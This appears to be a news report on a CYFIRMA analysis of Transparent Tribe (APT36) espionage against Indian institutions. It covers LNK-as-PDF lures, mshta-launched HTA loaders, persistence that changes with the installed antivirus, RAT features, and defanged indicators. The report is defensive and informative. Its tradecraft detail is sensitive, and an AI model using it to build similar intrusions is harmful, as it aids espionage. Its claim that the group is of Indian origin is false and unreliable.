Cybersecurity researchers have attributed a new wave of targeted cyber espionage activity to the threat group known as Transparent Tribe, also tracked as APT36, aimed at Indian government bodies, academic institutions, and strategically significant organizations.
According to a technical analysis published by CYFIRMA, the campaign relies on deceptive delivery methods, most notably a malicious Windows shortcut (LNK) file that masquerades as a legitimate PDF document. The shortcut embeds authentic PDF content, reducing suspicion while covertly executing malicious code in the background.
Transparent Tribe is a long standing cyber espionage group believed to be of Indian origin and has remained active since at least 2013. Over the years, the group has continuously refined its toolkit, deploying multiple remote access trojans including CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT.
Initial Infection and Execution Flow
The latest attacks begin with spear phishing emails containing ZIP archives. Inside the archive is a shortcut file disguised as a PDF. When opened, the LNK triggers the execution of a remote HTML Application script through mshta.exe. This script decrypts and loads the final RAT payload directly into memory while simultaneously opening a decoy PDF file to maintain the illusion of legitimacy.
CYFIRMA noted that the HTA script leverages ActiveX components such as WScript.Shell to interact with the Windows environment. This behavior enables system profiling and runtime adjustments, increasing execution reliability and ensuring compatibility across different target systems.
Adaptive Persistence Based on Antivirus Detection
A notable feature of the malware is its ability to dynamically adjust its persistence strategy based on the antivirus software installed on the compromised system.
If Kaspersky is detected, the malware creates a directory at C:\Users\Public\core\, writes an obfuscated HTA payload to disk, and establishes persistence through a shortcut placed in the Windows Startup folder that launches the script using mshta.exe.
If Quick Heal is present, persistence is achieved through a batch file and a malicious shortcut in the Startup folder, which executes the HTA payload.
In environments where Avast, AVG, or Avira are detected, the payload is directly copied into the Startup directory and executed.
If no recognized antivirus product is identified, the malware defaults to a combination of batch file execution, registry based persistence, and payload deployment prior to execution.
Capabilities of the Deployed RAT
The second stage HTA delivers a malicious DLL named iinneldc.dll, which functions as a fully featured remote access trojan. The RAT supports remote system control, file operations, data exfiltration, screenshot capture, clipboard monitoring, and process manipulation.
CYFIRMA emphasized that Transparent Tribe continues to demonstrate high levels of persistence and strategic focus, particularly in intelligence gathering against Indian government entities and educational institutions.
Related Campaign Using Government Advisory Lures
In recent weeks, the group has also been linked to another campaign leveraging a malicious shortcut file disguised as a government advisory PDF titled NCERT-Whatsapp-Advisory.pdf.lnk. This variant delivers a .NET based loader that deploys additional executables and DLLs to enable remote command execution, system reconnaissance, and long term access.
The shortcut executes an obfuscated command via cmd.exe to download an MSI installer named nikmights.msi from aeroclubofindia.co[.]in. The installer performs several actions, including displaying a decoy PDF, writing malicious DLLs to C:\ProgramData\PcDirvs\, executing a dropped binary after a delay, and establishing registry based persistence through an HTA script.
Interestingly, the decoy document is a legitimate advisory issued by Pakistan’s National Cyber Emergency Response Team (PKCERT) in 2024, warning about fraudulent WhatsApp campaigns targeting government entities.
The malicious wininet.dll communicates with a hard coded command and control server hosted at dns.wmiprovider[.]com, registered in mid April 2025. Although the C2 infrastructure is currently inactive, registry persistence mechanisms allow the malware to be reactivated at any time.
The DLL uses multiple HTTP GET based endpoints for registration, heartbeat communication, command execution, and anti virtual machine checks. To evade detection, endpoint strings are stored in reversed form.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
